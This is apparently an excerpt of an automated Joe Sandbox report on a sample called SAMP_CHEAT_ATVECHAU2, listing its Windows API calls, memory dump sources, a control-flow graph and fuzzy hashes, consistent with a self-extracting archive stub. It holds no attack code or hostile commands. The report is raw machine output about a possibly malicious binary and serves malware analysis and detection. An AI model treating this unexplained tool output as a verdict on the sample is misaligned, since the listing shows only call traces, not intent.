                                                    • SHGetMalloc.SHELL32(00D38438), ref: 00D0AC70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 3498096277-3360196438
                                                    • Opcode ID: aad11414b5c01339a02fe6feec6096bc45f2d89ac8dc3c49cb0e28c0e9045709
                                                    • Instruction ID: fe6d9542a4fd80424ec410875a37efca28793180d29fda641f14741833286301
                                                    • Opcode Fuzzy Hash: aad11414b5c01339a02fe6feec6096bc45f2d89ac8dc3c49cb0e28c0e9045709
                                                    • Instruction Fuzzy Hash: 67F0F4B1900309ABCB10AFA9D849AEFFFFCEF94745F00415AA815E2281DBB456058BB1

                                                    Control-flow Graph

                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D0DBF4
                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D0DC30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 1431749950-3493335439
                                                    • Opcode ID: 88ba7377d1865f568138fe51829cf64fa6395f63daf44b8acded0bc3d688f6cd
                                                    • Instruction ID: c3e1753ef11044312f4c5fe1210302b4a6946bfccaae67bf351ad96953266a0e
                                                    • Opcode Fuzzy Hash: 88ba7377d1865f568138fe51829cf64fa6395f63daf44b8acded0bc3d688f6cd
                                                    • Instruction Fuzzy Hash: 77F0A7724053347ADB211BD49C06FBA3B59EF18781B080411BD8D961D5D6B48950D6B4

                                                     Control-flow Graph

                                                     • Basic blocks:
                                                       • 1082: cf9785-cf9791
                                                       • 1083: cf979e-cf97b5 (ReadFile)
                                                       • 1084: cf9793-cf979b (GetStdHandle)
                                                       • 1085: cf97b7-cf97c0 (call cf98bc)
                                                       • 1086: cf9811
                                                       • 1088: cf9814-cf9817
                                                       • 1090: cf97d9-cf97dd
                                                       • 1091: cf97c2-cf97ca
                                                       • 1092: cf97cc
                                                       • 1093: cf97df-cf97e8 (GetLastError)
                                                       • 1094: cf97ee-cf97f2
                                                       • 1095: cf97cd-cf97d7 (call cf9785)
                                                       • 1096: cf97ea-cf97ec
                                                       • 1097: cf980c-cf980f
                                                       • 1098: cf97f4-cf97fc
                                                       • 1100: cf97fe-cf9807 (GetLastError)
                                                       • 1102: cf9809-cf980a
                                                     • Edges: 1082->1083, 1082->1084, 1083->1085, 1083->1086, 1084->1083, 1085->1090, 1085->1091, 1086->1088, 1090->1093, 1090->1094, 1091->1090, 1091->1092, 1092->1095, 1093->1094, 1093->1096, 1094->1097, 1094->1098, 1095->1088, 1096->1088, 1097->1088, 1098->1097, 1098->1100, 1100->1097, 1100->1102, 1102->1095
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CF9795
                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CF97AD
                                                    • GetLastError.KERNEL32 ref: 00CF97DF
                                                    • GetLastError.KERNEL32 ref: 00CF97FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: b4a181d2d0246e1bb54952190b5bd8117a819f853899721e8d69934becd1bfb3
                                                    • Instruction ID: 6b651922d0dae8b891c535fc99f8b5fce99a0ca1f1bff632cf8b12afd074194a
                                                    • Opcode Fuzzy Hash: b4a181d2d0246e1bb54952190b5bd8117a819f853899721e8d69934becd1bfb3
                                                    • Instruction Fuzzy Hash: ED115E30914308ABDFA16F65C804B7937A9FB523A0F10852AE626C6290D7749B849B63
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CFD710,00000000,00000000,?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue), ref: 00D1AD66
                                                    • GetLastError.KERNEL32(?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue,00D27970,FlsSetValue,00000000,00000364,?,00D198B7), ref: 00D1AD72
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D1ACDB,00CFD710,00000000,00000000,00000000,?,00D1AED8,00000006,FlsSetValue,00D27970,FlsSetValue,00000000), ref: 00D1AD80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 671d52c0bc7842438a98603282e706169053644c1f516711a98640b824806c56
                                                    • Instruction ID: eec994346446f23b002e88d2545fc5d5298f1a531738d6ba26a82b38f32ad599
                                                    • Opcode Fuzzy Hash: 671d52c0bc7842438a98603282e706169053644c1f516711a98640b824806c56
                                                    • Instruction Fuzzy Hash: 0401FC36302722BBC7314E6CBC44AD77B58EF157637150620F906D7650EF24D94186F1
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CFD343,00000001,?,?,?,00000000,00D0551D,?,?,?), ref: 00CF9F9E
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D0551D,?,?,?,?,?,00D04FC7,?), ref: 00CF9FE5
                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CFD343,00000001,?,?), ref: 00CFA011
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: a321cc3a03cc49874df0056a00f3b0dd4f6d7821c7c98a47c1c575a69db84c48
                                                    • Instruction ID: 1d8734f8ff1a212fdc3b543c14da66fb0b5e4552e36258f76cdcf076a359281d
                                                    • Opcode Fuzzy Hash: a321cc3a03cc49874df0056a00f3b0dd4f6d7821c7c98a47c1c575a69db84c48
                                                    • Instruction Fuzzy Hash: 9831C27120430AAFDB58CF20E808B7EB7A5EF84714F004519FA5697290CB759E49CBA3
                                                    APIs
                                                      • Part of subcall function 00CFC27E: _wcslen.LIBCMT ref: 00CFC284
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA2D9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA30C
                                                    • GetLastError.KERNEL32(?,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA329
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                    • String ID:
                                                    • API String ID: 2260680371-0
                                                    • Opcode ID: ddd48cc89928ddbd640b8bbcbaada5d7b1d81a20a4d8b7378601d69d9a058d46
                                                    • Instruction ID: c2faa681cb23f6026dd9abde7b3cf3b2c9306f1b5dc4c1a47a09ff5e7e391cb7
                                                    • Opcode Fuzzy Hash: ddd48cc89928ddbd640b8bbcbaada5d7b1d81a20a4d8b7378601d69d9a058d46
                                                    • Instruction Fuzzy Hash: 050128B520021C6AEFB1AF714C49BFDB3889F09380F044414FB19D21A5D758CB85D6B7
                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D1B8B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-3916222277
                                                    • Opcode ID: 0765aafa82285d8009982097135c86fff78f4b9ed4352fd77e71ac67d2d59ca1
                                                    • Instruction ID: 00ca7c71d473d295e5aefa05ed093e4bd650b1d16a5514697556fef7c3bfb1e2
                                                    • Opcode Fuzzy Hash: 0765aafa82285d8009982097135c86fff78f4b9ed4352fd77e71ac67d2d59ca1
                                                    • Instruction Fuzzy Hash: E141087050438CAADB228E689C84BF6BBEDDF55314F1804EEE5DA86142D7359A86CF70
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D1AFDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx
                                                    • API String ID: 2568140703-3893581201
                                                    • Opcode ID: e47fc0e1e5b40a78e9e361edceb36d22dcf01b95a5446f3ffe736ab73e2a6a23
                                                    • Instruction ID: 0eb817435bbb963a7dd5a54fdfc18454e89c2caf8a1bdc6aa0c3a78614c5d755
                                                    • Opcode Fuzzy Hash: e47fc0e1e5b40a78e9e361edceb36d22dcf01b95a5446f3ffe736ab73e2a6a23
                                                    • Instruction Fuzzy Hash: 08011732505219BBCF125F94EC01DEE7F62EF18754F014154FE1466260CA368A72EBA1
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D1A56F), ref: 00D1AF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-3084827643
                                                    • Opcode ID: aa2a1a74ac46cae973693e06114ec9beeb900caff930ce5bf8d411a6400ca547
                                                    • Instruction ID: 410623261478760c92580e0957b4950a1f2330fcdf1c967e160684793f33263d
                                                    • Opcode Fuzzy Hash: aa2a1a74ac46cae973693e06114ec9beeb900caff930ce5bf8d411a6400ca547
                                                    • Instruction Fuzzy Hash: 7FF0B431A46318BFCB225F54EC06DAE7F61EF14711B004094FC0896360DE714A519BF5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc
                                                    • API String ID: 2773662609-671089009
                                                    • Opcode ID: f07a039b820a147d9039a3ec5378efc49780461efee380255f2fdcf8ebfaba92
                                                    • Instruction ID: 8b1627c6e2418d832540b4c720b3f47bfb124ec7a2fe658e18b9be0e6bd8af39
                                                    • Opcode Fuzzy Hash: f07a039b820a147d9039a3ec5378efc49780461efee380255f2fdcf8ebfaba92
                                                    • Instruction Fuzzy Hash: 63E0E531786328BBC621AB69FC129AEBB54DB24721B010199F80597340DD745E828AFA
                                                    APIs
                                                      • Part of subcall function 00D1B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D1BA44,?), ref: 00D1B7E6
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D1BA89,?,00000000), ref: 00D1BC64
                                                    • GetCPInfo.KERNEL32(00000000,00D1BA89,?,?,?,00D1BA89,?,00000000), ref: 00D1BC77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: 3165bf09af5e9c558770f2a8a215e60665e9c8edd0eef41d5d12a2b98783f610
                                                    • Instruction ID: d22a55ca96997a67ae9f4b97e0e4f0b90e2f92e2b48465d0c464d7306bc2b946
                                                    • Opcode Fuzzy Hash: 3165bf09af5e9c558770f2a8a215e60665e9c8edd0eef41d5d12a2b98783f610
                                                    • Instruction Fuzzy Hash: 8C512770900345AEDB248F75E4816FABBE5EF51320F18446FD4968B291DF359585CBB0
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CF9A50,?,?,00000000,?,?,00CF8CBC,?), ref: 00CF9BAB
                                                    • GetLastError.KERNEL32(?,00000000,00CF8411,-00009570,00000000,000007F3), ref: 00CF9BB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 13eb3e5f6acaed14b00c44492e26ce2319c3b55b46d1f9c5a124818a77f69bc7
                                                    • Instruction ID: 47b907d06ff74a25dcafc1405005d95793fb8bbc08d957eb11ca84e6225da4a7
                                                    • Opcode Fuzzy Hash: 13eb3e5f6acaed14b00c44492e26ce2319c3b55b46d1f9c5a124818a77f69bc7
                                                    • Instruction Fuzzy Hash: C341BE316043098BDF74DF15E58467AB7E5FFD4310F148A2DEAA183260D770EE458A62
                                                    APIs
                                                      • Part of subcall function 00D197E5: GetLastError.KERNEL32(?,00D31030,00D14674,00D31030,?,?,00D13F73,00000050,?,00D31030,00000200), ref: 00D197E9
                                                      • Part of subcall function 00D197E5: _free.LIBCMT ref: 00D1981C
                                                      • Part of subcall function 00D197E5: SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D1985D
                                                      • Part of subcall function 00D197E5: _abort.LIBCMT ref: 00D19863
                                                      • Part of subcall function 00D1BB4E: _abort.LIBCMT ref: 00D1BB80
                                                      • Part of subcall function 00D1BB4E: _free.LIBCMT ref: 00D1BBB4
                                                      • Part of subcall function 00D1B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D1BA44,?), ref: 00D1B7E6
                                                    • _free.LIBCMT ref: 00D1BA9F
                                                    • _free.LIBCMT ref: 00D1BAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast_abort
                                                    • String ID:
                                                    • API String ID: 2991157371-0
                                                    • Opcode ID: d170a89c6eb21361d8bd3540684e1f3b73bca95325781acf3512e801e5b51dac
                                                    • Instruction ID: 657bc012a53d43fbdd6f9bba69c9d6d4b1597204aac95f0d04e8b97080cc5716
                                                    • Opcode Fuzzy Hash: d170a89c6eb21361d8bd3540684e1f3b73bca95325781acf3512e801e5b51dac
                                                    • Instruction Fuzzy Hash: 89318131904209BFDB10DBA8E541AD9B7E5EF50330F25409AE9049B2A2EF729D81DB70
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF1E55
                                                      • Part of subcall function 00CF3BBA: __EH_prolog.LIBCMT ref: 00CF3BBF
                                                    • _wcslen.LIBCMT ref: 00CF1EFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: f9cba53358dfe5867c5ab43e4cc46d3e2671bb50688237f3c3faa131c31315c9
                                                    • Instruction ID: b36a3309ec9d1b679d459012e349a737cbc3e346752a8bcfe562f681b6293774
                                                    • Opcode Fuzzy Hash: f9cba53358dfe5867c5ab43e4cc46d3e2671bb50688237f3c3faa131c31315c9
                                                    • Instruction Fuzzy Hash: F0314971904209EFCF55DF99D955AEEBBF6EF08300F24006AF989A7291CB325E40DB61
                                                    APIs
                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CF73BC,?,?,?,00000000), ref: 00CF9DBC
                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CF9E70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: d6a588749ee8074a8937bf06c2f7eb6746bf99d36b01c5c140bd4956f0398b4d
                                                    • Instruction ID: d9eab35c79d042934182f6f0be27e0af22ecf26dfa0c60d9c738beba22fa331b
                                                    • Opcode Fuzzy Hash: d6a588749ee8074a8937bf06c2f7eb6746bf99d36b01c5c140bd4956f0398b4d
                                                    • Instruction Fuzzy Hash: BB21EE31248349ABCB14CF64C891BBABBE8EF91304F08481DF5E583191D338EA0D8B62
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CF9F27,?,?,00CF771A), ref: 00CF96E6
                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CF9F27,?,?,00CF771A), ref: 00CF9716
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
